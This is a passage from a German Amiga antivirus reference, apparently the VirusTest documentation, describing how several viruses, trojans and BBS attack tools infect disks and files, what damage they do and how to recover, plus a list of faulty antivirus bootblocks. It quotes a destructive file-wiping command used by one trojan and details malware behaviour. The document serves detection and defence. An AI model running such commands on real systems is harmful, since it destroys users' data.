  7935.          Disk Zyl 40 Sektor 16-19) 4 Bloecke. Die ersten beiden Bloecke
  7936.          enthalten das Virusteil. Die restlichen beiden Bloecke enthalten
  7937.          den ehemaligen Original-BB. Dabei wurde ab der DOS-Kennung
  7938.          == ZENKER == eingetragen. Dies behindert die Vermehrung nicht,
  7939.          da das Virusteil erst ab $C in den Original-BB einspringt.
  7940.          Das Virusteil meldet sich NICHT.
  7941.          Vermehrung und Schaeden:
  7942.          Der Original-BB der eingelegten Disk wird nach $7FC00 geholt,
  7943.          == Zenker == eingetragen und dann mit dem Virus-Teil nach Zyl 40
  7944.          Sektor 16 ff. abgespeichert. File-Bloecke an dieser Stelle oder
  7945.          die BitMap (im Test passiert) werden ueberschrieben und koennen
  7946.          NICHT gerettet werden !! Tut mir leid. Danach wird der Bootloader
  7947.          in den BB geschrieben.
  7948.          Falls der BB-loader erkannt wurde, sollte das Gadget O-BB aktiviert
  7949.          werden. Sie koennen damit versuchen, den Original-BB von Zyl 40
  7950.          zu holen. VT schreibt dann die Dos0-Kennung und $370 neu. Danach
  7951.          wird die BB-CheckSum neu berechnet. Diesen BB koennen sie dann mit
  7952.          Speicher-BB zurueckschreiben oder im File-Req abspeichern.
  7953.          Vielleicht haben Sie Glueck und ihre Disk bootet wieder. Der
  7954.          Fehler auf Zyl 40 kann aber NICHT behoben werden.
  7955.          Auf Festplatte arbeiten Sie bitte so NICHT. Holen Sie das Backup
  7956.          des Rigid-Bereichs hervor (das haben Sie doch oder ???) und
  7957.          schreiben Sie den Rigid-Bereich mit ihrer Kontroller-Software
  7958.          (ist mir lieber so) oder wenn es gar nicht anders geht mit VT-
  7959.          Restore zurueck.
  7960.          Erkennung und Loeschung mit VT2.51 getestet:
  7961.          Speicher        19.03.93
  7962.          BB              19.03.93
  7963.          BlockITest      19.03.93
  7964.          BlockKette      19.03.93
  7965.          hole O-BB       21.03.93
  7966.          Hinweis 25.10.93: Das VirusTeil verseucht auch FFS-Disketten.
  7967.          Da aber immer ein DOS0-BB geschrieben wird (ist ausgetestet),
  7968.          wird beim naechsten Schreibzugriff (z.B. copy File) die Disk-
  7969.          Struktur noch weiter zerstoert.
  7970.  
  7971.  
  7972.    - ZIB-Inst.      Installer
  7973.          ab KS2.04: ja
  7974.          Verbogener Vektor: LoadSeg
  7975.          Resetfest: Nein
  7976.          Filename: z.B. loadwb
  7977.          Virusteillaenge: #1264 Bytes (also 4 Bytes mehr als ZIB-Virus)
  7978.          Link hinter den ersten Hunk.
  7979.          Speicherverankerung und Vermehrungsbedingungen:
  7980.            - siehe bei ZIB-Virus
  7981.            - es wird an die Files dann das ZIB-Virus (1260) gelinkt.
  7982.          Sprung aus loadwb in das Linkteil (auch mehrfach):
  7983.            - move 4.w,a6 (4 Bytes) wird zu bsr.w Linkteilstart  (6100wxyz)
  7984.            - move.l 4,a6 (6 Bytes) wird zu bsr.w Linkteilstart + 1 NOP
  7985.                - Looptiefe $7FFF
  7986.            - RTS wird zu bra.s Linkteilstart+4  (60yz)
  7987.                - Looptiefe $7B + 4
  7988.            (also anderer Vorgang als ZIB-Virus)
  7989.          VT versucht das Linkteil aus loadwb auszubauen.
  7990.                   
  7991.  
  7992.    - ZIB-Inst.-Inst.      Installer fuer loadwb
  7993.          Filename: z.B. spatch
  7994.          Virusteillaenge: #2080 Bytes
  7995.          Link hinter den ersten Hunk.   
  7996.          Decodiert (mit $85 und $BEEF) ist im Linkteil zu lesen: 
  7997.                                          496e               In
  7998.           7374616c 6c657220 76312e33 20627920 staller v1.3 by
  7999.           556e6974 65642046 6f726365 5320a931 United ForceS .1
  8000.           39393600 633a6c6f 61647762 0000646f 996.c:loadwb..do
  8001.           732e6c69 62726172 79000000          s.library...
  8002.          Sprung aus spatch in das Linkteil (auch mehrfach):
  8003.            - move 4.w,a6 (4 Bytes) wird zu bsr.w Linkteilstart  (6100wxyz)
  8004.            - move.l 4,a6 (6 Bytes) wird zu bsr.w Linkteilstart + 1 NOP
  8005.                - Looptiefe $7FFF
  8006.            - RTS wird zu bra.s Linkteilstart+4  (60yz)
  8007.                - Looptiefe $7B + 4  
  8008.              (also anderer Vorgang als ZIB-Virus)
  8009.          Vermehrungsbedingungen:
  8010.            - c:loadwb wird gefunden  (also SEHR gefaehrlich)
  8011.            - Medium validated
  8012.            - mind. #10 Block frei
  8013.            - usw.
  8014.            - Linkverlaengerung von loadwb um #1264 Bytes (also 4 Bytes
  8015.              mehr als ZIB-Virus)
  8016.          VT versucht das Linkteil aus spatch auszubauen.
  8017.  
  8018.  
  8019.    - ZIB-Virus      File  Link
  8020.          ab KS2.04: ja (cacheclear)
  8021.          Verbogener Vektor: LoadSeg
  8022.          Resetfest: Nein
  8023.          Fileverlaengerung: 1260 Bytes
  8024.          Link hinter den ersten Hunk.
  8025.          Decodiert (mit $BABE) ist im Linkteil zu lesen:
  8026.             0003b090 4e757877 fdfc646f 732e6c69 ....Nuxw..dos.li
  8027.             62726172 79006273 64736f63 6b65742e brary.bsdsocket.
  8028.             6c696272 61727900 533a5a49 42006c69 library.S:ZIB.li
  8029.          Speicherverankerung:
  8030.            - LastAlert wird auf "TRSi" geaendert
  8031.            - LoadSeg wird verbogen
  8032.            - neuer Prozess wird erzeugt  Name: ZIB
  8033.            - Es wird nach bsdsocket.library gesucht und falls vorhanden
  8034.              veraendert. Diese Lib liegt nicht in Libs,sondern wird von
  8035.              einigen Programmen (z.B. Miami) im Programm mitgefuehrt. Diese
  8036.              Lib wird immer nach Programmende (Miami) wieder aus dem
  8037.              Speicher entfernt, auch wenn Veraenderungen vorgenommen waren.
  8038.              (So war es auf meinem Testrechner).
  8039.          Vermehrungsbedingungen:
  8040.            - File ausfuehrbar ($3F3)
  8041.            - max. Filelaenge #125000 Bytes
  8042.            - min. Filelaenge keine Untergrenze gefunden
  8043.            - 3E9-Hunk wird gefunden
  8044.            - Medium validated
  8045.            - mind. 5 Block frei
  8046.            - RTS wird gefunden  ( max. loop $3E+1 )
  8047.            - RTS wird ersetzt durch bra.s oder NOP (falls RTS genau
  8048.              am Ende des ersten Originalhunks). Auch mehrere RTS
  8049.            - Versucht FileDate zu retten
  8050.            - Veraendert Word von Protection-LW 
  8051.          Falls bsdsocket.lib im Speicher, dann versucht der ZIB-Process
  8052.          ueber das Modem eine Nachricht abzuschicken.  
  8053.          VT versucht Loadseg im Speicher zurueckzusetzen.
  8054.          VT versucht das Linkteil aus einem File auszubauen.
  8055.          VT versucht den ZIB-Process aus dem Speicher zu entfernen.
  8056.          Besser waere aber ein Booten von einer sauberen Disk.
  8057.  
  8058.    - ZINE-Disk-Val. (L)  File
  8059.          anderer moeglicher Name: DEVIL-ZINE
  8060.          Fundort z.B: CD-LSD2:A/LEISURE/DISKMAGS/ZINE10.DMS
  8061.          Dringende Empfehlung: Loeschen
  8062.          Laenge: 1848 Bytes
  8063.          KEINE Verbogenen Vektoren
  8064.          NUR Bis KS1.3 einschl.
  8065.          Decodiert mit  eori.b #$27,(A1)+  ist im File zu lesen:
  8066.              20202020 20202020 20000941 46545343          ..AFTSC
  8067.              4e550000 5a494e45 31303a2e 66617374 NU..ZINE10:.fast
  8068.              64697200 20202020 20202020 20202020 dir.
  8069.              20202020 20202020 20202020 20202000                .
  8070.              46696c65 20537973 74656d00 00000000 File System.....
  8071.              536e6f6f 70446f73 00000000 000003f2 SnoopDos........
  8072.          Da die Routinen sehr kurz sind, sind danach noch Teile des
  8073.          Original-Disk-Validators zu finden, die aber NICHT erreicht
  8074.          werden.
  8075.          Ablauf:
  8076.          Test auf SnoopDos im Speicher
  8077.          Ja = Ende
  8078.          Nein Eor-Operation
  8079.          Danach soll LoadSeg ZINE10:.fastdir ausgefuehrt werden.
  8080.          CreateProc : Name FileSystem
  8081.  
  8082.    - ZINE-fastdir (L)  File
  8083.          Dringende Empfehlung: Loeschen
  8084.          Laenge: 840 Bytes
  8085.          Liegt bei der Disk im Root-Verzeichnis
  8086.          KEINE verbogenen Vektoren
  8087.          KEINE Vermehrung
  8088.          Die Ursprungsfunktion von .fastdir wird nicht erfuellt.
  8089.          Fundort: CD-LSD2:A/LEISURE/DISKMAGS/ZINE10.DMS
  8090.          Decodiert mit  eori.b #$27,(a1)+  ist im File zu lesen: 
  8091.              5a494e45 31303a63 2f2e6661 73746469 ZINE10:c/.fastdi
  8092.              72002020 20202020 20202020 20202020 r.
  8093.              20202020 20202020 20202020 20200000               ..
  8094.              74726163 6b646973 6b2e6465 76696365 trackdisk.device
  8095.          Da dieses File automatisch aktiviert wird, wenn der Disk-Val.
  8096.          unter KS1.3 gebraucht wird, wird zuerst das BitMapFlag auf
  8097.          #$FFFFFFFF gesetzt.
  8098.          Danach werden #$400 Bytes ueber das trackdisk.device nach
  8099.          #$6e000 (nur bei DD-disk=RootBlock) geschrieben.
  8100.          Danach wird die eor-Operation ausgefuehrt.
  8101.          Aufruf von DosExecute ZINE10:c/.fastdir
  8102.          Dieses Mal also ein fastdir in c .
  8103.  
  8104.    - ZINE-fastdir.BBS   File
  8105.          VT bietet NUR Loeschen an.
  8106.          Laenge gepackt:  9800 Bytes
  8107.          Laenge entpackt: 16696 Bytes
  8108.          KEINE verbogenen Vektoren
  8109.          KEINE Vermehrung
  8110.          Die Ursprungsfunktion von .fastdir wird nicht erfuellt.
  8111.          Fundort: CD-LSD2:A/LEISURE/DISKMAGS/ZINE10.DMS
  8112.          Entpackt ist am Fileanfang zu lesen:
  8113.             000003e9 00000b1b 4efa110a 42425300 ........N...BBS.
  8114.             44483000 44483100 4844303a 00484431 DH0.DH1.HD0:.HD1
  8115.             3a004448 30004448 31004844 30004844 :.DH0.DH1.HD0.HD
  8116.             31004242 533a0044 48303a42 42532f00 1.BBS:.DH0:BBS/.
  8117.             4448313a 4242532f 00484430 3a424253 DH1:BBS/.HD0:BBS
  8118.             2f004844 313a4242 532f0044 48303a00 /.HD1:BBS/.DH0:.
  8119.             4448313a 00484430 3a004844 313a0000 DH1:.HD0:.HD1:..
  8120.          Es duerfte sich also um den Versuch handeln, Manipulationen
  8121.          in einer Mailbox vorzunehmen. Ob die Kette vom falschen Disk-
  8122.          Validator ueber root:.fastdir zu c/.fastdir komplett arbeitet,
  8123.          habe ich nicht nachvollzogen, da ich keine BBS fahre.
  8124.          Lesen Sie bitte auch nach bei: Devil_11_B.Door
  8125.  
  8126.    - ZINKO  Trojan      Zerstoerung
  8127.          Filename vielleicht: FlowerPower.exe  L: 166992 Bytes
  8128.          VT bietet nur Loeschen an
  8129.          Vergleiche auch: VoxelSvind-Trojan
  8130.          Ablauf:
  8131.          Es wird ein Bild gezeigt:
  8132.          Dunkler breiter Diagonalbalken mit heller Schrift
  8133.              Iris presents
  8134.          Mit dem Text kann ich nichts anfangen. In Wirklichkeit
  8135.          werden auf sys: Veraenderungen vorgenommen.
  8136.          Schaden:
  8137.          An Files wird hinter 3F2 ein Textteil angehaengt mit
  8138.          variabler Laenge:
  8139.             000003f2 5a494e4b 4f204d41 44452054 ....ZINKO MADE T
  8140.             48495321 20492052 554c4521 20484148 HIS! I RULE! HAH
  8141.             41484148 41484148 4121204e 4f525448 AHAHAHAHA! NORTH
  8142.             45524e20 50414c41 43453a20 2b343520 ERN PALACE: +45
  8143.             35383530 20363038 31005a49 4e4b4f20 5850 6081.ZINKO
  8144.          Verzeichnisse vorher:
  8145.            s/startup-sequence
  8146.                    7  13-09-95
  8147.            devs/parallel.device
  8148.                 1812  13-09-95
  8149.            devs/printer.device
  8150.                26964  13-09-95
  8151.            devs/printers/Nec
  8152.                 6732  13-09-95
  8153.            devs/system-configuration
  8154.                  232  13-09-95
  8155.          Verzeichnisse nachher:
  8156.            s/000000000111000110100001110011
  8157.                18150  20-12-96
  8158.            s/000000000110110100100111100000
  8159.                 6528  20-12-96
  8160.            s/000000000110110011001101100100
  8161.                 2554  20-12-96
  8162.            devs/000000000011000100101100111111
  8163.                  147  20-12-96
  8164.            devs/000000000111010100001100000011
  8165.                19202  20-12-96
  8166.            devs/000000001000100100010100010111
  8167.                 3038  20-12-96
  8168.          Es werden also nicht nur die Namen geaendert und Text an-
  8169.          gehaengt, sondern auch zwischen den Dirs hin und her kopiert.
  8170.          z.B. Keines der Files im veraenderten s-Dir ist die startup-
  8171.          sequence. Ich sehe hier keine Rettungsmoeglichkeit mit einem
  8172.          vernuenftigen Zeitaufwand. Sie koennen zwar leicht mit einem
  8173.          Filemonitor den Text abschneiden, aber nicht in jedem File
  8174.          ist ein ASCII-String, durch den Sie den Filenamen zuordnen
  8175.          koennen. Tut mir leid.
  8176.  
  8177.    - ZOMBI I-Virus   Cool, im Prg DoIo, immer ab $7A000
  8178.          fordert trackdisk.device NICHT
  8179.          Vermehrung: BB
  8180.          Schaeden:
  8181.          Sobald die Zaehlzelle den Wert $F erreicht hat:
  8182.          - RootBlock und Bitmapblock neu schreiben !!!!
  8183.          - Name der Disk dann: Zombi I
  8184.          - Textausgabe mit DisplayAlert
  8185.             Text wird decodiert nach $70000 mit eori.l #$AAAAAAAA,(A0)+
  8186.                >>>>>    Hello AMIGA User !!!!!    <<<<<
  8187.                            HERE IS ZOMBI I
  8188.                    If you want to clean your Disks
  8189.                     use Zombie I without risks !
  8190.  
  8191.          Da der BitMapBlock immer nach $371 geschrieben wird, was aber
  8192.          im DOS nicht zwingend festgelegt ist, kann ein File, das beim
  8193.          Block $371 beginnt, zerstoert werden. Alle Hashwerte im Root-
  8194.          Block werden auf Null gesetzt. Beim BitMapTest erkennen Sie
  8195.          diese Disk am Namen Zombi I ab $1B0.
  8196.          Rettung: DiskSalv aufrufen.
  8197.  
  8198.    - ZonderKommando 1  File   (Name nachvollziehbar)
  8199.          anderer Name: Mongo09  s.o.
  8200.          bekanntes File: mongo09.exe 
  8201.          Gegen BBS gerichtet.      
  8202.          Laenge gepackt : 1708 Bytes
  8203.          Laenge entpackt: 3368 Bytes
  8204.          Keine verbogenen Vektoren:
  8205.          Keine Vermehrung als Einbruchswerkzeug.
  8206.          Sucht nach Snoopdos    Falls ja Ende
  8207.          Sucht nach ACP.STARTUP Falls nein Ende
  8208.          Legt File FLT_DSQ.DMS an (Das Hackfile=Daten ist codiert)
  8209.          VT bietet loeschen an.
  8210.          Fileauszug aus entpacktem File:     
  8211.            4eaefeda 4a806730 4cdf7fff 4e755a6f N...J.g0L..NuZo
  8212.            6e646572 204b6f6d 6d616e64 6f203230 nder Kommando 20
  8213.            3038202d 20546865 204e6577 2047656e 08 - The New Gen
  8214.                  ;.....
  8215.            51c8fffa 4e750000 00000000 533a4143 Q...Nu......S:AC
  8216.            502e5354 41525455 50000000 00000000 P.STARTUP.......
  8217.                  ;.....
  8218.            00000000 00000000 0000434f 4e465f4c ..........CONF_L
  8219.            4f43414c 2030322d 0075706c 6f61642f OCAL 02-.upload/
  8220.            464c545f 4453512e 444d5300 75736572 FLT_DSQ.DMS.user
  8221.            2e646174 61004242 535f4c4f 43415449 .data.BBS_LOCATI
  8222.            4f4e2000 00000000 00000000 00000000 ON .............
  8223.                  ;.....
  8224.            00006262 733a636f 6e666967 30000000 ..bbs:config0...
  8225.                  ;.....
  8226.            00000000 00000000 536e6f6f 70446f73 ........SnoopDos
  8227.  
  8228.    - ZonderKommando 2  File   (Name nicht nachvollziehbar aber ueber-
  8229.          nommen)
  8230.          anderer Name: Mongo51  s.o.
  8231.          Bekannte Files: mongo51.exe
  8232.          Laenge gepackt : 1464 Bytes
  8233.          Laenge entpackt: 2268 Bytes
  8234.          Keine verbogenen Vektoren:
  8235.                          trsi-znt.exe
  8236.          Laenge gepackt : 21784 Bytes
  8237.          Laenge entpackt: 184552 Bytes
  8238.          Gegen BBS gerichtet
  8239.          Keine Vermehrung als Einbruchswerkzeug.
  8240.          Sucht nach Snoopdos    Falls ja Ende
  8241.          Sucht nach Port ServerRP0  Falls nein Ende
  8242.          Sucht nach ACP.STARTUP Falls nein Ende
  8243.          Legt File ATX_NADA.DMS an (Passworte ???)
  8244.          VT bietet loeschen an.
  8245.          Fileauszug aus entpacktem File:
  8246.            000751c8 fffa4e75 00000000 533a4143 ..Q...Nu....S:AC
  8247.            502e5354 41525455 50000000 00000000 P.STARTUP.......
  8248.                  ;.....
  8249.            00000000 00000000 0000434f 4e465f4c ..........CONF_L
  8250.            4f43414c 2030322d 0075706c 6f61642f OCAL 02-.upload/
  8251.            4154585f 4e414441 2e444d53 00757365 ATX_NADA.DMS.use
  8252.            722e6461 74610042 42535f4c 4f434154 r.data.BBS_LOCAT
  8253.            494f4e20 00000000 00000000 00000000 ION ............
  8254.                  ;.....
  8255.            536e6f6f 70446f73 00536572 76657252 SnoopDos.ServerR
  8256.            50300000 000003ec 0000004f 00000000 P0.........O....
  8257.  
  8258.    - ZSPEED-Virus   File  Laenge ungepackt: 9556
  8259.          gefunden in Archiv: XPRZSPEED.LHA  8703
  8260.          Von der Definition kein Virus, da keine Vermehrung, sondern
  8261.          Zerstoerungs-File gegen AmiExpress (BBS). Also KEINE Gefahr
  8262.          fuer den Normal-User.
  8263.          Empfehlung: einfach loeschen UND s.seq aendern !!!
  8264.            lesbarer Textauszug am Fileende:
  8265.            00000058 0000005A 06060000 5850522D ...X...Z....XPR-
  8266.            53706565 64657220 56332E32 202D2041 Speeder V3.2 - A
  8267.            43544956 45202D20 30343A31 33424253 CTIVE - 04:13BBS
  8268.            64656C65 74652062 62733A23 3F20616C delete bbs:#? al
  8269.            6C626273 3A446970 5F696E5F 44554445 lbbs:Dip_in_DUDE
  8270.            ....
  8271.            4746412D 42415349 43000000 00000000 GFA-BASIC.......
  8272.          Versucht in doc zu taeuschen:
  8273.      This tool was coded in order to improve your Z-Modem transfers.
  8274.      And it works really good in 30 % of our TEST-Downloads there was
  8275.      an acceleration of nearly 6-7 % !!!
  8276.         Fileerkennung mit VT getestet :    08.10.92
  8277.         WICHTIG: wird von VT im Speicher NICHT gefunden !!!!!
  8278.         Deshalb sollten Mailbox-Betreiber ab und zu in  vt/listen/task
  8279.         suchen nach:
  8280.      $003ae000  wait      process     Background CLI [xprzspeedV3.2.exe]
  8281.  
  8282.         Schadensverlauf:
  8283.          - soll mit run gestartet werden
  8284.          - gibt dann im cli aus: XPR-Speeder V3.2 - ACTIVE
  8285.          - oeffnet nur einen Port OHNE Namen
  8286.         (deshalb auch keine Speichererkennung mit VT  vgl. VT/Listen/Port)
  8287.          - wird um 04:13 Uhr (Nacht) aktiviert
  8288.          - delete bbs:#? all
  8289.          - holt delete (zumindest bei mir wird in Sys: danach gesucht)
  8290.          - loescht alle Files in bbs:
  8291.          - loescht ram:temp
  8292.          - legt Dip_in_DUDE neu an
  8293.          - vergroessert dieses File bis die Partition voll ist
  8294.          - dann ein System-Requester bbs voll
  8295.          - dieses File enthaelt bei mir nur Muell und die geloeschten
  8296.            Filenamen
  8297.  
  8298.    - erkannte Virenfinder:
  8299.      =====================
  8300.       teilweise KickRomV1.2, haeufig mit Bootblock-Schreibzugriff,
  8301.       veraltet, resident, werden nach Abfrage geloescht
  8302.  
  8303.       - ABC-VKiller    Empfehlung: sofort loeschen
  8304.             immer ab $7F400, KickTag im Prg. DoIo
  8305.             lila Bildschirm
  8306.             Im BB ist zu lesen:
  8307.            20566972 75734b69 6c6c6572 2f446574  VirusKiller/Det
  8308.            6563746f 72205631 2e303120 20202020 ector V1.01
  8309.            41204142 43205072 6f647563 74696f6e A ABC Production
  8310.  
  8311.       - ACID Terminator V3.0  AntiVirusBB
  8312.             nicht fuer KS2.04 geeignet, da absolute Werte geschrieben
  8313.             werden.
  8314.             Empfehlung deshalb: loeschen
  8315.  
  8316.       - AmigaDOS Viruskiller V2.1 immer ab 7F3F0, resetfest
  8317.             verbiegt DoIo, KickTag, OpenOldLib, und im Prg OpenWindow
  8318.             Schreibt in CLI-Leiste AmigaDOS  Viruskiller 2.1
  8319.             meldet veraenderten Bootblock und bietet BB-AmigaDOS an.
  8320.             GURU mit KS2.04 deshalb Empfehlung loeschen
  8321.  
  8322.       - Anti-Virus_Boot V1.1 c1991 by Hoeppelsoft
  8323.             KickTag, KickMem, KickCheckSum
  8324.             bei Erstinstallierung: gruener Bildschirm
  8325.             bei Reset : Bildschirm mit blauen Streifen
  8326.             eigentlich harmlos, aber:
  8327.             verhindert bei mir mit KS2.04 booten von Festplatte
  8328.             Empfehlung deshalb :   loeschen
  8329.  
  8330.       - ASS VirusProtector V1.0  (KickV1.2, Tonfolge)
  8331.             FastMem ja, KickTag, KickCheckSum, Vec5
  8332.             Soll vor SCA schuetzen. VOELLIG ueberholt. Dringende
  8333.             Empfehlung; Loeschen
  8334.             Lesen Sie bitte auch VTkennt A-K DataLock Installer
  8335.           6e6b7320 746f2074 68652041 53532056 nks to the ASS V
  8336.           49525553 2050524f 54454354 4f522056 IRUS PROTECTOR V
  8337.           312e3020 2a2a2a00 00000000 00000000 1.0 ***.........
  8338.  
  8339.       - Blizzard Protector V1.0
  8340.             testet Cool, Vec3, falls veraendert wird ohne Warnung
  8341.             eigener BB geschrieben (verwendet dazu ueber den verbogenen
  8342.             CoolVector das andere Prg (jsr 82(a0))
  8343.             Empfehlung: loeschen
  8344.  
  8345.       - BlizzPro V3.1    cool, Fastmem ja,
  8346.             im Prg. closedevice (oh, was neues)
  8347.             Vermehrung: ueber BB
  8348.             erkennt einige Viren, schreibt aber KS1.2 DoIo zurueck
  8349.             Meldung ueber DisplayAlert
  8350.             unverschluesselter Text im BB:
  8351.             BlizzPro V3.1  und Virennamen
  8352.  
  8353.       - BlizzPro V3.3     Cool gegenueber BlizzPro V3.1 verschoben
  8354.             NICHT mit KS2.04
  8355.             kein Virus = Bildschirm gruen
  8356.             sonst s.o.
  8357.             unverschluesselter Text im BB:
  8358.             BlizzPro V3.3  und Virennamen
  8359.             Empfehlung: sofort loeschen
  8360.  
  8361.       - CLONK-Virus  DoIo, KickMem, KickTag, KickCheckSum, SumKickData
  8362.             nur 512KB Chip (oder resetfestes 1MB), da zur Aktivierung
  8363.             immer ein Reset ausgefuehrt wird. (7D042 nach $80, TRAP 0)
  8364.             Ursprungsprogramm: Clonk! (Alcatraz)
  8365.             Clone: TAI10-CLONK-Virus s.o.
  8366.  
  8367.       - DISKGUARD v1.0   cool, im Prg DoIo, immer $7FA00
  8368.             Vermehrung: ueber BB
  8369.             Meldung fremder BB.e: mit DisplayAlert
  8370.             schreibt immer  DoIo von KS1.2, Folge: Guru mit KS1.3
  8371.             Empfehlung: loeschen
  8372.  
  8373.       - Exterminator 2   cool, im Prg DoIo
  8374.             FastMem: nein
  8375.             KS2.04:  nein
  8376.             Empfehlung deshalb: L=loeschen
  8377.  
  8378.       - H.C.S I      veraendert cool, im Prg DoIo, loescht KickTag
  8379.                      im Speicher immer ab $7EC00
  8380.                      Vermehrung: jeder DOS-BB ohne Warnung !!!!
  8381.            4F4C4420 482E432E 5320414E 54492D56 OLD H.C.S ANTI-V
  8382.            49525553 202D2048 2E432E53 20273432 IRUS - H.C.S '42
  8383.            3230202A 2A2A0000 00607E2A 2A2A2042 20 ***...`~*** B
  8384.  
  8385.  
  8386.       - H.C.S II  veraendert cool       laenger als HCS1
  8387.                   erkennt einige alte BBViren ( Alertmeldung )
  8388.                   beim ersten Bootblockschreiberfolg wird noch der
  8389.                   DoIo-Vector verbogen und bleibt verbogen
  8390.                   bei leerem Laufwerk blinkt PowerLed
  8391.  
  8392.       - JoshuaKill.BB        Cool, DoIo
  8393.          KS3.0: ja
  8394.          a)fordert trackdisk.device NICHT
  8395.          b)belegt bei Bedarf OHNE Check Speicher ab $7FF00
  8396.             - Empfehlung deshalb: Loeschen
  8397.          Aufgaben:
  8398.             Testet Vektoren und sucht mit DoIo im BB nach Joshua.
  8399.             Mit DisplayAlert wird bei Bedarf ein Text ausgegeben.
  8400.             Joshua.BB wird ueberschrieben.
  8401.          Im BB ist u.a. zu lesen:
  8402.            THIS BOOTBLOCK IS NO VIRUS! IT KILLS JOSHUA VIRUS I+II!
  8403.  
  8404.       - Outlaw-VirusChecker
  8405.          keine Vermehrung, erkennt SCA. Schreibt aber immer KS1.2 Werte
  8406.          (z.B. Vec5 $fc12fc) zurueck. Folge: GURU mit KS1.3
  8407.          nicht resident
  8408.          Empfehlung: loeschen
  8409.  
  8410.       - M&U  V5.5 u. V6.1   KickTag, KickCheckSum immer $7F400
  8411.          nach Reset auch DoIo, prueft die Standard-Vektoren und
  8412.          springt bei der Erstinstallation, falls diese nicht 0 sind,
  8413.          ins ROM zum Reset.
  8414.          Fehler: or.l $550(a6),d0  (richtig:$226)
  8415.          Stand: Feb. u. Maerz 90
  8416.          Empfehlung deshalb: sofort loeschen
  8417.  
  8418.       - MemClear.BB        Cool $7F0AE
  8419.          Keine Vermehrung, KS2.06: ja  Empfehlung: Loeschen
  8420.          Setzt Reset-Vektoren auf Null und verbiegt dann Cool wieder
  8421.          Namensbegruendung: im BB uncodiert zu lesen
  8422.            203e204d 656d6f72 79436c65 6172426f  > MemoryClearBo
  8423.            6f745631 2e323520                   otV1.25
  8424.  
  8425.       - Monkey-Killer   AssProt-Clone  Empfehlung loeschen  s.o.
  8426.          Endlich hat es jemand geschafft den Text abzuaendern. Leider
  8427.          erkennt VT diesen BB weiterhin als ASS-Prot.BB .
  8428.  
  8429.  
  8430.       - N-STAR-Killer  BB   Empfehlung loeschen
  8431.             Testet Cool und KickTag auf 0
  8432.             Falls ja   blauer Hintergrund und weiter
  8433.             Falls nein ROM-Reset $FC0004
  8434.             Keine verbogenen Vektoren
  8435.             Keine Vermehrungsroutine
  8436.             Datenschrott (falls vorhanden) hinter dem Text wird NIE
  8437.             erreicht.
  8438.             Version V1.7:
  8439.            79002020 20202020 56312e37 20202020 y.      V1.7
  8440.            20205649 5255534b 494c4c45 52204652   VIRUSKILLER FR
  8441.            4f4d2a2a 204e4f52 54482053 54415220 OM** NORTH STAR
  8442.             Version V2.0:
  8443.            61727900 20202020 20205632 2e302020 ary.      V2.0
  8444.            20202020 56495255 534b494c 4c455220     VIRUSKILLER
  8445.            46524f4d 2a2a204e 4f525448 20535441 FROM** NORTH STA
  8446.            52202a2a 20202057 72697474 656e2062 R **   Written b
  8447.  
  8448.  
  8449.       - NO BANDIT  soll ByteBandit am Bootblockbefall hindern
  8450.          Text:  NO BANDIT ANYMORE!  R.T.
  8451.          Empfehlung: loeschen
  8452.  
  8453.       - PayDay.BB   Als AntiVirusBB gebaut           Starfire2-Clone
  8454.          Dringende Empfehlung: Loeschen, da voellig veraltet.
  8455.          Namensbegruendung:
  8456.          Im BB ist zu lesen: PayDay !!!
  8457.          Cool $7EC0E, im Prg DoIo $7ECF0, im Speicher immer ab $7EC00
  8458.          KS2.04: Guru 4 nach Reset
  8459.          Fordert trackdisk.device NICHT
  8460.          Ablauf:
  8461.          Testet auf DOS0-Kennung
  8462.          Testet jeweils 1 Langwort, z.B Band, fuer verschiedene BB-Viren.
  8463.          Falls eines gefunden wird, wird mit DisplayAlert ein Text aus-
  8464.          gegeben und das Schreiben des Payday-BBs angeboten.
  8465.          Ich rate dringend davon ab, da Probleme mit KS2.04 ent-
  8466.          stehen und nicht einmal 10 BB erkannt werden.
  8467.  
  8468.       - RedGhost-AV (L)   Bootblock
  8469.          Verbogene Vektoren: KickTag und im Prg. DoIo
  8470.          Im Speicher immer ab $FF600
  8471.          Soll ein AntivirusBB sein, ABER !!!
  8472.           - Fordert trackdisk.device NICHT
  8473.          DRINGENDE Empfehlung  SOFORT Loeschen
  8474.          Im BB ist uncodiert zu lesen:
  8475.            696f6e2e 6c696272 61727900 52656447 ion.library.RedG
  8476.            686f7374 00556e6b 6e6f7700 4e6f7445 host.Unknow.NotE
  8477.            78650056 69727573 0050726f 74656374 xe.Virus.Protect
  8478.  
  8479.  
  8480.       - Sherlock     AntiVirenBB , Cool, DoIo, resident im Speicher,
  8481.          im Speicher immer ab 7FA00, benutzt zusaetzlich 7CA00,
  8482.          Textausgabe mit DisplayAlert
  8483.          schreibt bei mehr als 512KB  BeginIo an falsche Stelle,
  8484.          Empfehlung: loeschen
  8485.          Hinweis: 04.03.92 (Brief)
  8486.             soll Disks zerstoeren. Getestet: nicht aufgetreten
  8487.  
  8488.  
  8489.       - SystemZ V3.0, 4.0, 4.1, 5.0, 5.1, 5.3, 5.4, 6.1, 6.3, 6.4, 6.5
  8490.          KickTag, KickCheckSum, loescht Cool, im Prg. DoIo
  8491.          Melodie und Farbbalken
  8492.          ab 6.3 keine speicherabsolute Adresse mehr
  8493.          neuer Name Virusprotector (meldet sich vor Schreibzugriff)
  8494.                z.B. :
  8495.             20535953 54454D20 5A205649 52555320  SYSTEM Z VIRUS
  8496.             2050524F 54454354 4F522056 342E3020  PROTECTOR V4.0
  8497.  
  8498.       - Trackers Antivirus V1.2
  8499.          blauer Streifen, helle Schrift
  8500.          2 alte absolute ROM-Einspruenge
  8501.          Empfehlung deshalb: sofort loeschen
  8502.  
  8503.       - TRACKERS-AV.BB (H) V3.0 harmlos
  8504.          roter Streifen, helle Schrift
  8505.          Testet Cool, Cold, KickTag also ein AntiVirus.BB
  8506.          KS 3.1 ja  68040 ja
  8507.          Bei Bedarf wird Loeschen oder Weiter mit Maustasten angeboten.
  8508.          Im BB ist zu lesen:    
  8509.           20544845 20545241 434b4552 532d414e  THE TRACKERS-AN
  8510.           54495649 52555320 56332e30 2021202d TIVIRUS V3.0 ! -
  8511.  
  8512.       - VERA      File
  8513.          Filelaenge: #2472 Bytes
  8514.          Ein AntiVirusProgramm und KEIN (!!!!) Virus
  8515.          Verbogene Vektoren: Cold, BeginIo, Int5
  8516.          Resetfest: ja
  8517.          Hat Probleme mit Cache:
  8518.          Im File ist zu lesen:
  8519.             42814eae ff704e75 6000004c 20544845 B.N..pNu`..L THE
